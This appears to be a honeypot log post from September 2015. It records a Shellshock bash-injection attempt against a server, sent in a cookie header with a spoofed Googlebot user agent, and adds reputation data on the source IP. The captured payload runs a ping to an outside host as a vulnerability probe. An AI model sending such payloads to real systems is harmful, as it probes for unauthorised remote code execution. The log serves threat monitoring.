Montag, 21. September 2015

46.172.71.251 - simple bash injection

BEGIN OF HTTP DATA:
2015-09-21 20:45:43
Source IP: 46.172.71.251
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
46.172.71[.]251
    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS43110 Joint Ukrainian-American enterprise Ewropol with legal form Ltd
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt